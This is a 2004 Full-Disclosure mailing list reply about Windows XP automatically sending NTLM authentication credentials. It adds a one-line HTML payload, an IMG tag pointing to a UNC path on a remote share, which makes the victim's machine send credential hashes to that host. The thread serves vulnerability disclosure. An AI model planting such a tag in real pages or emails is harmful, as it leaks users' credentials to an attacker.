Dear Hidenobu Seki, This problem is known since at least 1997 and still can be exploited with <IMG SRC="\\w.x.y.z\fakeshare\fakefile"> without any MS Word document.
--Tuesday, September 28, 2004, 2:20:13 AM, you wrote to [EMAIL PROTECTED]: HS> Hello. HS> For your information: HS> Automatically passing NTLM authentication credentials on Windows XP HS> http://www.securityfriday.com/Topics/winxp3.html HS> Thank you. HS> _________________________________________________________________ HS> Add photos to your messages with MSN 8. Get 2 months FREE*. HS> http://join.msn.com/?page=features/featuredemail HS> _______________________________________________ HS> Full-Disclosure - We believe in it. HS> Charter: http://lists.netsys.com/full-disclosure-charter.html -- ~/ZARAZA Особую проблему составляет алкоголизм. (Лем) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
